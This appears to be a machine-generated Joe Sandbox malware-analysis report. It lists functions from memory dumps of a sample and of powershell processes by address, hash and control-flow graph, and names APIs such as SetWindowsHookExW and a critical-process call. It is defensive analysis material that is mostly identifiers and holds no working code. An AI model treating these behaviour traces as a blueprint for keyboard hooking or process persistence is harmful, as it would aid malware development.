                                                                                          • Source File: 00000003.00000002.3444502991.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848a40000_24572628.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 86e90689477525ead5abe44d0d0ac29494407e65c91a5061f3911b7d34146a5f
                                                                                          • Instruction ID: 42b88930d5fecd33a74e6a068c2a21238fd47a773b7d720b20b84058e3fdc665
                                                                                          • Opcode Fuzzy Hash: 86e90689477525ead5abe44d0d0ac29494407e65c91a5061f3911b7d34146a5f
                                                                                          • Instruction Fuzzy Hash: E0F1943090DA8D8FEFA8EF28C8567E937E1FF54350F04426AD84DC7295CB74A9458B92
                                                                                          Function 00007FF848A46E72 Relevance: .5, Instructions: 459COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 815 7ff848a46e72-7ff848a46e7f 816 7ff848a46e8a-7ff848a46f57 815->816 817 7ff848a46e81-7ff848a46e89 815->817 821 7ff848a46f59-7ff848a46f62 816->821 822 7ff848a46fc3 816->822 817->816 821->822 824 7ff848a46f64-7ff848a46f70 821->824 823 7ff848a46fc5-7ff848a46fea 822->823 831 7ff848a46fec-7ff848a46ff5 823->831 832 7ff848a47056 823->832 825 7ff848a46fa9-7ff848a46fc1 824->825 826 7ff848a46f72-7ff848a46f84 824->826 825->823 828 7ff848a46f88-7ff848a46f9b 826->828 829 7ff848a46f86 826->829 828->828 830 7ff848a46f9d-7ff848a46fa5 828->830 829->828 830->825 831->832 833 7ff848a46ff7-7ff848a47003 831->833 834 7ff848a47058-7ff848a4707d 832->834 835 7ff848a4703c-7ff848a47054 833->835 836 7ff848a47005-7ff848a47017 833->836 840 7ff848a470eb 834->840 841 7ff848a4707f-7ff848a47089 834->841 835->834 838 7ff848a4701b-7ff848a4702e 836->838 839 7ff848a47019 836->839 838->838 842 7ff848a47030-7ff848a47038 838->842 839->838 844 7ff848a470ed-7ff848a4711b 840->844 841->840 843 7ff848a4708b-7ff848a47098 841->843 842->835 845 7ff848a4709a-7ff848a470ac 843->845 846 7ff848a470d1-7ff848a470e9 843->846 851 7ff848a4718b 844->851 852 7ff848a4711d-7ff848a47128 844->852 847 7ff848a470ae 845->847 848 7ff848a470b0-7ff848a470c3 845->848 846->844 847->848 848->848 850 7ff848a470c5-7ff848a470cd 848->850 850->846 853 7ff848a4718d-7ff848a47265 851->853 852->851 854 7ff848a4712a-7ff848a47138 852->854 864 7ff848a4726b-7ff848a4727a 853->864 855 7ff848a4713a-7ff848a4714c 854->855 856 7ff848a47171-7ff848a47189 854->856 857 7ff848a4714e 855->857 858 7ff848a47150-7ff848a47163 855->858 856->853 857->858 858->858 860 7ff848a47165-7ff848a4716d 858->860 860->856 865 7ff848a4727c 864->865 866 7ff848a47282-7ff848a472e4 call 7ff848a47300 864->866 865->866 873 7ff848a472eb-7ff848a472ff 866->873 874 7ff848a472e6 866->874 874->873
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3444502991.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848a40000_24572628.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e0a1bf71a83393298b81e17aae9e0f3e506a50731e407f522304108d9a42dee2
                                                                                          • Instruction ID: b1e26d22d2c2e00d0fc1e1086dd0970c61aee8d21192cdbbef805b8ddcd9a591
                                                                                          • Opcode Fuzzy Hash: e0a1bf71a83393298b81e17aae9e0f3e506a50731e407f522304108d9a42dee2
                                                                                          • Instruction Fuzzy Hash: EBE1C53050DA8D8FEFA8EF28C8567E977E1FF54350F04426AD84DC7295CB7898448B82
                                                                                          Function 00007FF848A420F1 Relevance: .2, Instructions: 211COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3444502991.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848a40000_24572628.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d4f23ca38155ed8ff45866c99de4cea48162ba04451d18d100548ecb1680a1fd
                                                                                          • Instruction ID: 28cf5dc15c7fc7b7f60e0785b0ceefb3051e014905c1df9839f9455409970096
                                                                                          • Opcode Fuzzy Hash: d4f23ca38155ed8ff45866c99de4cea48162ba04451d18d100548ecb1680a1fd
                                                                                          • Instruction Fuzzy Hash: 24512F20A1E6C95FDB86AB7C58652767FE0DF87669F0800FAE08EC71D7DE480846C356
                                                                                          Function 00007FF848A49758 Relevance: 1.8, APIs: 1, Instructions: 250COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3444502991.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848a40000_24572628.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalProcess
                                                                                          • String ID:
                                                                                          • API String ID: 2695349919-0
                                                                                          • Opcode ID: f8f0d57a34dde0771350cd2813fdbb07f0860154bf78192f9774122aa9b1b2f9
                                                                                          • Instruction ID: 8e139c91778db993c784e78a1719c4fa51aae4844141f4b917eb3ff11a7883a6
                                                                                          • Opcode Fuzzy Hash: f8f0d57a34dde0771350cd2813fdbb07f0860154bf78192f9774122aa9b1b2f9
                                                                                          • Instruction Fuzzy Hash: A9813831D0E6C54FEB16EB6C581A6F97FE0FF12760F1800BFD08987193EA6858468756
                                                                                          Function 00007FF848A49838 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3444502991.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848a40000_24572628.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalProcess
                                                                                          • String ID:
                                                                                          • API String ID: 2695349919-0
                                                                                          • Opcode ID: 6e9115f855d9aaddf5ba937f43233d2b971494d0e2fa946ba83b6f6cffec277f
                                                                                          • Instruction ID: a55c5a6f69d02249f74305f88da94f61215fa9fcff78b6031e0f109b69a535e7
                                                                                          • Opcode Fuzzy Hash: 6e9115f855d9aaddf5ba937f43233d2b971494d0e2fa946ba83b6f6cffec277f
                                                                                          • Instruction Fuzzy Hash: CE51493180DA848FEB1AEB6C984A6F97FE0FF51720F18007FD08987193DB646845C796
                                                                                          Function 00007FF848A49DA8 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 389 7ff848a49da8-7ff848a49daf 390 7ff848a49dba-7ff848a49e2d 389->390 391 7ff848a49db1-7ff848a49db9 389->391 395 7ff848a49eb9-7ff848a49ebd 390->395 396 7ff848a49e33-7ff848a49e40 390->396 391->390 397 7ff848a49e42-7ff848a49e7f SetWindowsHookExW 395->397 396->397 399 7ff848a49e87-7ff848a49eb8 397->399 400 7ff848a49e81 397->400 400->399
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3444502991.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848a40000_24572628.jbxd
                                                                                          Similarity
                                                                                          • API ID: HookWindows
                                                                                          • String ID:
                                                                                          • API String ID: 2559412058-0
                                                                                          • Opcode ID: 91c99edd2c91de99dea9ec65ea6a4d4f5b1fadd956880d344d55fa8338b32f83
                                                                                          • Instruction ID: 725f532995d55d84fb3d27b5b791f90bb3f02fa64ff320afc939c5604dab9c67
                                                                                          • Opcode Fuzzy Hash: 91c99edd2c91de99dea9ec65ea6a4d4f5b1fadd956880d344d55fa8338b32f83
                                                                                          • Instruction Fuzzy Hash: EB310A3091CA5C4FDB18EB6C98466F97BE1EB95721F14023ED009C3292DB756852C7D1

                                                                                          Non-executed Functions

                                                                                          Function 00007FF848A4108D Relevance: .3, Instructions: 251COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3444502991.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_7ff848a40000_24572628.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c1812b69a0ac20149f34c5bea184f5552d42753f84dddcc69b5f49c8023a1974
                                                                                          • Instruction ID: dcc4799346d82c2de9579bd62e27659deec3d571d00d7954570991556c291187
                                                                                          • Opcode Fuzzy Hash: c1812b69a0ac20149f34c5bea184f5552d42753f84dddcc69b5f49c8023a1974
                                                                                          • Instruction Fuzzy Hash: 8B612527A0E5727AE611FBBDB4555FD7B10DF813B5B0801B7D58C8D483CE04388A82E5

                                                                                          Executed Functions

                                                                                          Function 00007FF848A49D38 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2363697766.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff848a40000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: KSN
                                                                                          • API String ID: 0-4249579523
                                                                                          • Opcode ID: 1d493c0e36aecaef4e18b964c6b7953db62abbf724a69bbc32d9a7ff22dd406c
                                                                                          • Instruction ID: 09eaf151824d2ac6917dd95d4c71ab758b3e457452feb6ab3f6609e1b45a8037
                                                                                          • Opcode Fuzzy Hash: 1d493c0e36aecaef4e18b964c6b7953db62abbf724a69bbc32d9a7ff22dd406c
                                                                                          • Instruction Fuzzy Hash: 2CF0B43280DA8C8FDF45EF2888295A47FE0FF25341F0401A7D40EC70A1DB64A848C783
                                                                                          Function 00007FF848B1660A Relevance: .4, Instructions: 443COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2364158159.00007FF848B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B10000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff848b10000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9e08fd5dac800da4cb472a590efe7c7cba224948fa0165bd72e5d5c52ec62edb
                                                                                          • Instruction ID: b0b904d52a91afd5fdcab005d07156c1859023ce9da216215dfa39fcfad1e7de
                                                                                          • Opcode Fuzzy Hash: 9e08fd5dac800da4cb472a590efe7c7cba224948fa0165bd72e5d5c52ec62edb
                                                                                          • Instruction Fuzzy Hash: 8BD11131D1EA8A5FE799AB6858145B97BE0EF163D0F0801FFD44DCB493EA18AC05C356
                                                                                          Function 00007FF848B14073 Relevance: .2, Instructions: 187COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2364158159.00007FF848B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B10000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff848b10000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1d4cf8faa0ac61563ce6cdb0c6972cc2cd352e7ed1ffe2b933b55e6ef54943a1
                                                                                          • Instruction ID: 701eddbe9a08b7c1719cf288b1c65ac3d121ff50049f48bce7b3a742eb74e5b5
                                                                                          • Opcode Fuzzy Hash: 1d4cf8faa0ac61563ce6cdb0c6972cc2cd352e7ed1ffe2b933b55e6ef54943a1
                                                                                          • Instruction Fuzzy Hash: 1B510632E0DA4A4FE799EE2CA411675BBD3EF556A0F1801BAC00DCB596DF24EC158349
                                                                                          Function 00007FF848B14370 Relevance: .1, Instructions: 148COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2364158159.00007FF848B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B10000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff848b10000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fbcbe8cbd72955eba8eb61cee8a873ad439d8f9b4a94d3ad05375c958cdc553b
                                                                                          • Instruction ID: 4a865e42aba6c938e43b62880d508106c215c82b4a5ce9c0310864ae3261f1c4
                                                                                          • Opcode Fuzzy Hash: fbcbe8cbd72955eba8eb61cee8a873ad439d8f9b4a94d3ad05375c958cdc553b
                                                                                          • Instruction Fuzzy Hash: 35411A32E0DA494FE7A9EF2CA4516B877D2EF447A0F0801BAC05DCB587EF18AC158385
                                                                                          Function 00007FF84892E380 Relevance: .1, Instructions: 130COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2363224331.00007FF84892D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84892D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff84892d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3162b2727763205b4525af486263aab537e442edf824530db98687fbb0b25a1e
                                                                                          • Instruction ID: c1782429a744909e3cb168aceedf229e8b8e7ed980a197e248de2af3b3561f31
                                                                                          • Opcode Fuzzy Hash: 3162b2727763205b4525af486263aab537e442edf824530db98687fbb0b25a1e
                                                                                          • Instruction Fuzzy Hash: D341237080DBC54FE756DB2898899663FB0EF52362F1506EFD088CB1A3D625A846C792
                                                                                          Function 00007FF848A49768 Relevance: .1, Instructions: 124COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2363697766.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff848a40000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f6782e97a8cb2238eb39250840f048b79b5af94058284c389052f20c5175828c
                                                                                          • Instruction ID: 58527981afcd6c227853e8c840f51b697ade573e34d1a0f39ccfc14356909c10
                                                                                          • Opcode Fuzzy Hash: f6782e97a8cb2238eb39250840f048b79b5af94058284c389052f20c5175828c
                                                                                          • Instruction Fuzzy Hash: A131F43191CB489FDB18EF5CA80A6F97BE0FB99710F10422FE049D3251DA70A8568BC3
                                                                                          Function 00007FF848A4A62C Relevance: .1, Instructions: 102COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2363697766.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff848a40000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1bdfb062a5ef76a1c63d3066d253bf5c137107d817a963b238d38fa85b544142
                                                                                          • Instruction ID: 9371b4cf10e637c148358d1d7b7f9ecb61ac1d5c2c537b544e89c9f15cd5e6d4
                                                                                          • Opcode Fuzzy Hash: 1bdfb062a5ef76a1c63d3066d253bf5c137107d817a963b238d38fa85b544142
                                                                                          • Instruction Fuzzy Hash: F521E63190DB8C4FDB59DF6C984A7E9BBE0EB56321F04426BD048C3152DA74A456CB92
                                                                                          Function 00007FF848B140BF Relevance: .1, Instructions: 100COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2364158159.00007FF848B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B10000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff848b10000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c44ff7799bebb8d799ef5e95587eb80d086ee178ea3bda26c83a3ea5221bcb37
                                                                                          • Instruction ID: 8a75ef3fb3238a71b3945dfd6536a3ee74b3bcf5eeb2aedff9580cf24fe7db2f
                                                                                          • Opcode Fuzzy Hash: c44ff7799bebb8d799ef5e95587eb80d086ee178ea3bda26c83a3ea5221bcb37
                                                                                          • Instruction Fuzzy Hash: 0B21F532D0DA8B4FE3A9EE2C9851176ABD3FF516D0F5900B9C01DCB9A2CF18EC148209
                                                                                          Function 00007FF848B143BC Relevance: .1, Instructions: 64COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2364158159.00007FF848B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B10000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff848b10000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 55718c34f87b9e2a8b72b2cb0450436485a66a8ec20b9998c7daf0e2ca166d8e
                                                                                          • Instruction ID: 22a1d5f7005df0cedfc616e3c85d72c9c44a6f75b0b2b40da9a4d210600aac07
                                                                                          • Opcode Fuzzy Hash: 55718c34f87b9e2a8b72b2cb0450436485a66a8ec20b9998c7daf0e2ca166d8e
                                                                                          • Instruction Fuzzy Hash: B611C232D0E5464FE6A9EF2CA4A45B877D2EF406E0F5900BAD01DCB996DF19AC108389
                                                                                          Function 00007FF848A433B5 Relevance: .0, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2363697766.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff848a40000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                          • Instruction ID: 3da116da0be1b4c1508acfa62cbd6f92ad9b972e918f88cc15f38a6f0a0fe9be
                                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                          • Instruction Fuzzy Hash: EA01447115CB088FDB44EF0CE451AA5B7E0FB95364F10056DE58AC3655DA26E882CB46
                                                                                          Function 00007FF848A4A2AA Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2363697766.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff848a40000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5e8e0665a13af5e0ad7318e461e1e3711317f0930a59325702bf76d65cd17a4a
                                                                                          • Instruction ID: 9ff93c5a55cc5da921e6a1ab776d46e415f1feed4a195b5509c125c16886ffe7
                                                                                          • Opcode Fuzzy Hash: 5e8e0665a13af5e0ad7318e461e1e3711317f0930a59325702bf76d65cd17a4a
                                                                                          • Instruction Fuzzy Hash: 47E0127580894C8FDB44EF1898555E57BA0FB64301B00015AE41DC7160D7719558CBC2

                                                                                          Non-executed Functions

                                                                                          Function 00007FF848A48BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.2363697766.00007FF848A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff848a40000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: N_^4$N_^7$N_^F$N_^J
                                                                                          • API String ID: 0-3508309026
                                                                                          • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                                          • Instruction ID: f4428ff80c8e499c95de5b7c8e82f3b355c429bcf9004aa7847cd7b3bae16acc
                                                                                          • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                                          • Instruction Fuzzy Hash: 4521F6B7A0D5256EE301BBBDFC145FD3B40DF942B474502B3D2A8CB543E914758A8AD2

                                                                                          Executed Functions

                                                                                          Function 00007FF848A6644D Relevance: .7, Instructions: 697COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.2485858551.00007FF848A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_7ff848a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 40efc9cffe2de735fbff286de320574830bef2ce7c03062f5eb66c16d1bb74f9
                                                                                          • Instruction ID: 81d51766ddd569712359c5514d82fc673078ae15760b79547bc9295f1792604a
                                                                                          • Opcode Fuzzy Hash: 40efc9cffe2de735fbff286de320574830bef2ce7c03062f5eb66c16d1bb74f9
                                                                                          • Instruction Fuzzy Hash: D6D18030A0DA4D8FDF88EF68C455AA97BF1FF68340F14416AD449D729ACB74E881CB91
                                                                                          Function 00007FF848B36605 Relevance: .4, Instructions: 433COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.2486695211.00007FF848B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_7ff848b30000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f4b389a9b244e4cf0eec8d6f3fa8d6b8f2b772615859c3a15fed389b66fcd30a
                                                                                          • Instruction ID: 86107d579e09de7ee9e3c7d5d2a34d90ee3d88e4f501ebe52857f0bce0cbeaf0
                                                                                          • Opcode Fuzzy Hash: f4b389a9b244e4cf0eec8d6f3fa8d6b8f2b772615859c3a15fed389b66fcd30a
                                                                                          • Instruction Fuzzy Hash: 11D14431D1EB8A9FE79AAB6868145B97BE0EF1A390F0401BFD40DC7193EE18A805C355
                                                                                          Function 00007FF848B34073 Relevance: .2, Instructions: 187COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.2486695211.00007FF848B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_7ff848b30000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ca7225d2e8f48d82a732f873d27bc52a12b6464951503cad4864939b404a74bc
                                                                                          • Instruction ID: 738fbe12fd988c9ac916c15adf610d4fb2dc9f1f572f2d28047dc86f73bc61e5
                                                                                          • Opcode Fuzzy Hash: ca7225d2e8f48d82a732f873d27bc52a12b6464951503cad4864939b404a74bc
                                                                                          • Instruction Fuzzy Hash: 69511432E1DE4A4FE79AEA6C54112757BD2EF65660F1801BBC00DC7596DF28EC058349
                                                                                          Function 00007FF848B34370 Relevance: .1, Instructions: 148COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.2486695211.00007FF848B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_7ff848b30000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4687a10cee72a4ac64936f2ba5b257ce2dd85eceeeee44007211f95ca6e680ea
                                                                                          • Instruction ID: e80b7972e12bacf791b95d68c198e63e51a98a9128271a8a32e3ed68b58a19f5
                                                                                          • Opcode Fuzzy Hash: 4687a10cee72a4ac64936f2ba5b257ce2dd85eceeeee44007211f95ca6e680ea
                                                                                          • Instruction Fuzzy Hash: 06412632E4DA4A4FE7A9EB6C64116B877D1EF55760F0801BBC05DC7583EF18AC158385
                                                                                          Function 00007FF84894EC60 Relevance: .1, Instructions: 127COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.2485117869.00007FF84894D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84894D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_7ff84894d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ace91c0d5b2251653780196e347d31ba90c13ac95cbdaf14cdf47c5243d40f2f
                                                                                          • Instruction ID: e0a030db5f38d0f4ff2835e708b7c083be2b9ae675852d43fcb847bce0bed7f4
                                                                                          • Opcode Fuzzy Hash: ace91c0d5b2251653780196e347d31ba90c13ac95cbdaf14cdf47c5243d40f2f
                                                                                          • Instruction Fuzzy Hash: 8941153080DBC44FE7569B389C45A523FF0EF57221B1906DFD088CB5A3C629A846C7A2
                                                                                          Function 00007FF848A697AB Relevance: .1, Instructions: 112COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.2485858551.00007FF848A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_7ff848a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 75087042d8b1aab7d5e65c43176cc10bcf0aa2165318b19c81042d1c1ae3d1c6
                                                                                          • Instruction ID: 07a04b39b2e1b2310d06ecb12614bd28a1d26c6166e15fefdf88e38cde42ab0f
                                                                                          • Opcode Fuzzy Hash: 75087042d8b1aab7d5e65c43176cc10bcf0aa2165318b19c81042d1c1ae3d1c6
                                                                                          • Instruction Fuzzy Hash: FA318F3191CB4C9FDB18EB5CA84A6A97BE0FB98721F00422FE449D3251CB71A8558BC2
                                                                                          Function 00007FF848B340BF Relevance: .1, Instructions: 100COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.2486695211.00007FF848B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_7ff848b30000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 454a9d054f5d621a5b0b9e465957b9f2d6a85a2b8c1b9c03e21ccf2314055687
                                                                                          • Instruction ID: 987194574073f84d514c75af894e2cc34882d82811608d50927aebb6b7cc0ffb
                                                                                          • Opcode Fuzzy Hash: 454a9d054f5d621a5b0b9e465957b9f2d6a85a2b8c1b9c03e21ccf2314055687
                                                                                          • Instruction Fuzzy Hash: 1821D132E1DE8A4FE3AAEA5C58511766BD1FF70690F5901BBC01DC75A2CF28EC448349
                                                                                          Function 00007FF848A6A49C Relevance: .1, Instructions: 99COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.2485858551.00007FF848A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_7ff848a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
